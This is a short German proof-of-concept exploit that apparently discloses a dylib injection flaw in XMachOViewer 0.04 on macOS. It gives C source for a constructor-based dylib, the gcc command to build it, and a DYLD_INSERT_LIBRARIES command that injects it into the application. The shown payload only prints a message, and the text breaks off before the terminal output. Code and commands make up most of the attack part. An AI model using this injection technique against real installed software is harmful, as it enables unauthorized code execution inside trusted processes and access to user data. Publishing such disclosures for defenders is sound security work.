
Proof-of-Concept-Exploit für eine dylib-Injection-Schwachstelle in XMachOViewer 0.04, der unbefugte Codeausführung über DYLD_INSERT_LIBRARIES unter macOS demonstriert.
Eine Dylib-Injection-Sicherheitslücke in XMachOViewer 0.04 ermöglicht es Angreifern, die Integrität zu gefährden. Durch Ausnutzung dieser Schwachstelle kann nicht autorisierter Code in die Prozesse des Produkts eingeschleust werden, was potenziell zu Fernsteuerung und unbefugtem Zugriff auf sensible Benutzerdaten führen kann.

Tragbare Version für macOS
#include <syslog.h>
#include <stdio.h>
__attribute__((constructor))
static void poc(void)
{
printf("Malicious Dylib Inserted");
}
Kompilieren
gcc -dynamiclib -arch x86_64 -o poc.dylib poc.c
Und injizieren:
DYLD_INSERT_LIBRARIES=poc.dylib /Applications/XMachOViewer.app/Contents/MacOS/XMachOViewer
Dies öffnet die Anwendung und führt das Dylib aus. Nach dem Schließen der Anwendung sehen wir es im Terminal:
